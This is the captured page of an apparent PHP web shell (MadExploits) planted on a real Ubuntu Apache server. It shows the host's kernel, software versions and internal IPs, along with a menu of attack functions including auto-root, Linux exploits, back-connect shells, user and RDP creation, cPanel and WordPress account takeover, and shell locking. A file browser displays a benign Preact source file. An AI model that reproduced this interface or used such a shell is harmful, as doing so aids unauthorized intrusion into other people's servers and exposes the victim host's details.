Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
preact /
src /
diff /
[ HOME SHELL ]
Name
Size
Permission
Action
catch-error.js
1.2
KB
-rw-rw-r--
children.js
13.64
KB
-rw-rw-r--
index.js
16.75
KB
-rw-rw-r--
props.js
4.83
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catch-error.js
/** * Find the closest error boundary to a thrown error and call it * @param {object} error The thrown value * @param {VNode} vnode The vnode that threw the error that was caught (except * for unmounting when this parameter is the highest parent that was being * unmounted) * @param {VNode} [oldVNode] * @param {ErrorInfo} [errorInfo] */ export function _catchError(error, vnode, oldVNode, errorInfo) { /** @type {Component} */ let component, /** @type {ComponentType} */ ctor, /** @type {boolean} */ handled; for (; (vnode = vnode._parent); ) { if ((component = vnode._component) && !component._processingException) { try { ctor = component.constructor; if (ctor && ctor.getDerivedStateFromError != null) { component.setState(ctor.getDerivedStateFromError(error)); handled = component._dirty; } if (component.componentDidCatch != null) { component.componentDidCatch(error, errorInfo || {}); handled = component._dirty; } // This is an error boundary. Mark it as having bailed out, and whether it was mid-hydration. if (handled) { return (component._pendingError = component); } } catch (e) { error = e; } } } throw error; }
Close